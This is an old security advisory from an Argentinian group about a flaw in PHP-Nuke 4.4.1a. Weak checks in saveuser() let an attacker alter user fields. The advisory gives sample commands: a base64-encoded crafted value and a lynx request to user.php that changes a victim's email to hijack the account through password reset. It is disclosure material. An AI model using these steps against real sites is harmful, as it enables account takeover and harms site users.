r 0 t t e n  d e v 1 c e  C r e w
                          r0tten dev1ce Crew

            A r g e n t i n i a n  S e c u r i t y  G r o u p
                       Argentinian Security Group

<[( advisory )]>---------------------------------------<[( rdC270201.adv.en

Programa: PHP-NUKE
Vendor Homepage: http://www.phpnuke.org
Vendor Contacted: 27/feb/2001
Vendor Response: ??/??/??
Vendor Fix: ??/??/??
Version tested: 4.4.1a (latest version to date)
Found by: venomous
English translation: ka0z

- Problem description:

The checks that are realized in the function saveuser() are not enough to
block abitrary information being passed to the query of MySQL.
[!] There are also many other functions that can be exploited the same way
described in the advisory. This adivisory describes only the function

- Impact:

It's possible for the attacker to change the e-mail address of one of the
users and ask for the password to be sent to the e-mail address that the
attacker have provided.
Of course this isn't easy since we do not know the UID of each of the
users, but this this type of information is easily obtained with
bruteforce checks.

- Exploit:

powerhouse:~$ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode -m f
begin-base64 644 f
MDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK     [***]

lynx http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user>

The variables you can change the value are:

name='',email='', femail='', url='', bio='' , user_avatar='',
user_icq='', user_occ='', user_from='', user_intrest='', user_sig='',
user_aim='', user_yim='', user_msnm=''

In other words, if we want to change the e-mail address, we do:

<email you want>

If you ask for the password to be sent to e-mail, you would be able to
access the account.

- Code:

Very simple script to demostrate the vulnerability:

You can get it from http://www.rdcrew.com.ar, code section.

- Fix:

Wait for a patch from the author.

- Contact us:

Advisories, tools, IDS, texts and other stuff can be found at:


- Greets:

  people: ka0z, den0, E|Bruj0, storm, ab.
channels: #flatline at coredumped


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